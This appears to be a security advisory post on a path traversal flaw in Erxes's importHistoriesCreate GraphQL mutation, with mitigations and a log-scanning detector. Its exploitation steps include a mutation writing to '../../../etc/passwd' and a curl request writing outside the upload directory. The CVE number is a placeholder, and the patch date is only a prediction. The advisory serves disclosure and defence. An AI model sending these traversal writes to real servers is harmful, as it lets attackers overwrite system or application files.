Erxes, Path Traversal, CVE-2025-XXXXX (Moderate)


How the CVE Works

CVE-2025-XXXXX is a path traversal vulnerability in Erxes versions before 1.6.2. The flaw is in the handler for the `importHistoriesCreate` GraphQL mutation, which does not adequately validate a user-supplied file path before writing to it. An authenticated user can place `../` sequences in that path to write a file outside the directory intended for import uploads. The impact depends on where the Erxes service account can write: at minimum, attacker-controlled content lands on the server filesystem; if the process can reach configuration, application code or system files, that can escalate to code execution or privilege escalation. The root cause is insufficient input validation of file paths received through the GraphQL API.

DailyCVE Form:

Platform: Erxes
Version: <1.6.2
Vulnerability: Path Traversal
Severity: Moderate
Date: Jun 10, 2025

Prediction: Patch by Jul 15, 2025

What Undercode Says:

Exploitation:

1. Craft Malicious Request (the argument names `file` and `content` follow this post's example; check them against the schema of the target deployment):

mutation {
importHistoriesCreate(file: "../../../etc/passwd", content: "malicious_data")
}

2. Verify Write Access (the JSON body needs a Content-Type header; TOKEN is a session token for any authenticated user):

curl -X POST -H "Authorization: Bearer TOKEN" -H "Content-Type: application/json" -d '{"query":"mutation { importHistoriesCreate(file: \"../../tmp/test\", content: \"test\") }"}' http://erxes-server/graphql

3. Check File Creation (on the server host, so only in a lab you control; `../../tmp/test` lands in /tmp only if the upload directory sits two levels below the filesystem root, otherwise adjust the number of `../` segments):

ls -la /tmp/ | grep test
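Defenders want to spot the request shape from steps 1 and 2 in their own logs. The following is an added example, not code from Erxes or from the original post: it scans application request-log lines for the `importHistoriesCreate` mutation whose arguments contain a traversal sequence, peeling URL-encoding first so `%2e%2e%2f` and double-encoded variants do not slip past. It assumes the application logs the raw JSON body of each GraphQL request at the end of the line; the sample lines are constructed for illustration.

```javascript
// Added example (not Erxes code or part of the original post): scan application
// request logs for the importHistoriesCreate mutation carrying "../" in its arguments.
// Assumes the app logs one line per request with the raw JSON body at the end; the
// sample lines below are constructed for illustration, not taken from a real server.
const SAMPLE_LOG = [
  '2025-06-10T12:00:01Z 10.0.0.5 POST /graphql {"query":"mutation { importHistoriesCreate(file: \\"2025/leads.csv\\", content: \\"...\\") }"}',
  '2025-06-10T12:00:02Z 10.0.0.9 POST /graphql {"query":"mutation { importHistoriesCreate(file: \\"../../tmp/test\\", content: \\"test\\") }"}',
  '2025-06-10T12:00:03Z 10.0.0.9 POST /graphql {"query":"mutation { importHistoriesCreate(file: \\"..%2F..%2Fetc%2Fpasswd\\", content: \\"x\\") }"}',
  '2025-06-10T12:00:04Z 10.0.0.7 POST /graphql {"query":"query { customers { _id } }"}',
  '2025-06-10T12:00:05Z 10.0.0.9 POST /graphql not-json',
];

// "../" or "..\" anywhere after decoding; ".." on its own is a legitimate substring (e.g. "report..csv").
const TRAVERSAL = /\.\.[\\/]/;

// Peel URL-encoding a few times so %2e%2e%2f and double-encoded %252e%252e%252f are both caught.
function decodeLayers(s) {
  let out = s;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(out); } catch (e) { break; }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Pull the JSON body off the end of a log line; returns null when there is none.
function extractBody(line) {
  const start = line.indexOf('{');
  return start < 0 ? null : line.slice(start);
}

// Classify one log line: flagged only when importHistoriesCreate is called with a traversal sequence.
function analyzeLine(line) {
  const body = extractBody(line);
  if (body === null) return { flagged: false, reason: 'no body' };
  let query;
  try { query = JSON.parse(body).query || ''; } catch (e) { return { flagged: false, reason: 'unparseable body' }; }
  if (!/\bimportHistoriesCreate\b/.test(query)) return { flagged: false, reason: 'other operation' };
  if (TRAVERSAL.test(decodeLayers(query))) return { flagged: true, reason: 'traversal sequence in importHistoriesCreate call' };
  return { flagged: false, reason: 'importHistoriesCreate without traversal' };
}

// Returns only the suspicious lines, each with the reason it was flagged.
function scan(lines) {
  return lines.map((line) => ({ line, ...analyzeLine(line) })).filter((r) => r.flagged);
}

for (const hit of scan(SAMPLE_LOG)) console.log(`ALERT ${hit.line.slice(0, 30)}... ${hit.reason}`);
```

Running it flags the second and third sample lines and ignores the benign import, the unrelated query and the unparseable line. The decode loop is the part that matters: a plain `grep "../"` over the same log misses the `%2F`-encoded request entirely.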

Protection:

1. Path Containment Check (not string stripping; removing `../` is bypassed by inputs such as `....//`, and the original pattern `/..\//g` left the dots unescaped, so it matched any two characters before a slash):

const path = require('path');
function sanitizePath(baseDir, input) { // reject anything that resolves outside baseDir
const resolved = path.resolve(baseDir, input);
const rel = path.relative(baseDir, resolved);
if (rel === '' || rel === '..' || rel.startsWith('..' + path.sep)) throw new Error('path traversal rejected');
return resolved;
}

2. Patch Verification (`npm show` prints the newest version on the npm registry; compare it with the version the deployment actually runs, from its package.json or admin UI, and confirm that is 1.6.2 or later):

npm show erxes version

3. File Permission Lockdown (tightening the upload directory does not stop a write that has already escaped it; the effective control is running Erxes as an unprivileged user with write access only to its own data directories; the path below is an assumed install location):

chmod -R 750 /var/www/erxes/uploads

4. GraphQL Query Filtering (depth limiting curbs abusive nested queries and is general hardening; it does not inspect argument values, so it is not a fix for this bug; uses express-graphql and graphql-depth-limit):

const { graphqlHTTP } = require('express-graphql');
const depthLimit = require('graphql-depth-limit');
app.use('/graphql', graphqlHTTP({
schema,
validationRules: [depthLimit(5)]
}));

5. Log Monitoring (web-server access logs record only `POST /graphql`; the operation name is in the request body, so log the operation name and arguments at the application layer and search that log; the path below is assumed):

grep "importHistoriesCreate" /var/log/erxes/access.log

6. WAF Rule (nginx `$args` holds only the URL query string, so this rule never sees a mutation sent in a JSON POST body like the curl above; it catches only GET-style GraphQL requests, and body inspection needs a WAF module such as ModSecurity; the dots are escaped and the URL-encoded form is matched because `$args` is not decoded):

location /graphql {
if ($args ~* "\.\./|%2e%2e") { return 403; }
}

7. Mitigation Workaround (replace the resolver so the mutation always fails until the patch is deployed; `resolvers` stands for the application's GraphQL resolver map and is an assumed name):

// Disable mutation until patch
resolvers.Mutation.importHistoriesCreate = () => {
throw new Error('importHistoriesCreate is disabled pending the path traversal fix');
};

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
